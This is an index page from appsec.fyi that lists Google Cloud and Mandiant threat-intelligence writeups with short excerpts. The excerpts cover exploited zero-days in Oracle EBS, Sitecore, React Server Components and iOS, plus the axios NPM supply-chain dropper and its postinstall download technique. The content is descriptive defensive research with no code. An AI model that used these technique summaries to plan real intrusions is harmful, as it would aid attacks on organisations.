cloud.google.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-04-19.
| Date Added | Resource | Excerpt |
|---|---|---|
| 2026-04-19 2026 | Oracle E-Business Suite Zero-Day Exploited — Google CloudSSRF | Library of techniques and analysis detailing exploitation of Oracle E-Business Suite (EBS) by the CL0P extortion group. The campaign, which may have leveraged CVE-2025-61882 as a zero-day, involved mass exploitation of vulnerabilities, including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection, leading to remote code execution. The analysis covers intrusion activity preceding the extortion emails, the multi-stage Java implant framework, and provides indicators of compromise for defenders. |
| 2026-04-16 2026 | DarkSword iOS Exploit Chain Adopted by Multiple Threat Actors - GoogleMobile | Library for detecting and analyzing the DarkSword iOS exploit chain, which leverages multiple zero-day vulnerabilities to compromise devices. It details its use by various threat actors, including UNC6748, against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine. The library identifies specific vulnerabilities like CVE-2025-31277 and CVE-2026-20700, and the deployed malware families GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER, supporting iOS versions 18.4 through 18.7. |
| 2026-04-16 2026 | ViewState Deserialization Zero-Day in Sitecore (CVE-2025-53690)Deser | Writeup of CVE-2025-53690, a ViewState deserialization zero-day impacting Sitecore deployments. Mandiant's investigation revealed attackers exploiting an exposed sample machine key to achieve remote code execution. Post-exploitation involved WEEPSTEEL reconnaissance, archiving sensitive files like `web.config`, and using tools such as EARTHWORM, DWAGENT, and SHARPHOUND for network tunneling, remote access, and Active Directory enumeration, culminating in privilege escalation and lateral movement via RDP. |
| 2026-04-11 2026 | DPRK Threat Actor Compromises Axios NPM PackageSupply Chain | Library that analyzes a North Korea-nexus threat actor's compromise of the popular "axios" NPM package. The attacker introduced a malicious dependency, "plain-crypto-js," which acted as an obfuscated dropper for the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux. The dropper uses `postinstall` hooks and OS-specific techniques involving PowerShell, curl, and bash to download and execute platform payloads, aiming for reconnaissance and command execution. GTIG attributes this to financially motivated UNC1069, noting infrastructure overlaps and the evolution of the WAVESHAPER backdoor. |
| 2026-04-10 2026 | 2025 Zero-Days in Review: Lessons LearnedRCE | Survey of 2025 zero-day exploits reveals a continued shift towards enterprise targets, with 48% of tracked vulnerabilities impacting enterprise software and edge devices. State-sponsored espionage groups, particularly those linked to the People's Republic of China (PRC) such as UNC5221 and UNC3886, heavily favored these technologies for initial network access, while commercial surveillance vendors also expanded their exploit chain development. Malware campaigns like BRICKSTORM highlighted a new paradigm of using stolen IP for long-term zero-day development. |
| 2026-04-10 2026 | Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)RCE | Writeup detailing exploitation of CVE-2025-55182 ("React2Shell"), a critical RCE in React Server Components, by multiple threat actors including China-nexus espionage groups. Observed payloads include MINOCAT, SNOWLIGHT, HISONIC, COMPOOD backdoors, and XMRIG miners. The writeup highlights exploitation chains and post-compromise behaviors, with specific mention of UNC6600, UNC6586, UNC6588, and UNC6603 actors, and their deployment of these tools. It also addresses misinformation surrounding initial exploit disclosures, noting a GitHub repository that initially contained non-functional AI-generated exploit code before updating with legitimate, obfuscated samples. |
| 2026-04-03 2026 | Now You Serial, Now You Don't — Systematically Hunting for Deserialization Exploits | Google CloudDeser | Library for hunting deserialization exploits, featuring tools like HeySerial.py for rule generation and CheckYoself.py for validation. This resource details the systematic research process used to develop these tools, enabling the detection of exploitation attempts against vulnerabilities in Exchange (CVE-2021-42321), Zoho ManageEngine (CVE-2020-10189), Jira (CVE-2020-36239), Telerik (CVE-2019-18935), Jenkins (CVE-2016-9299), and log4j (CVE-2021-44228), by identifying gadget chains and malicious payloads. |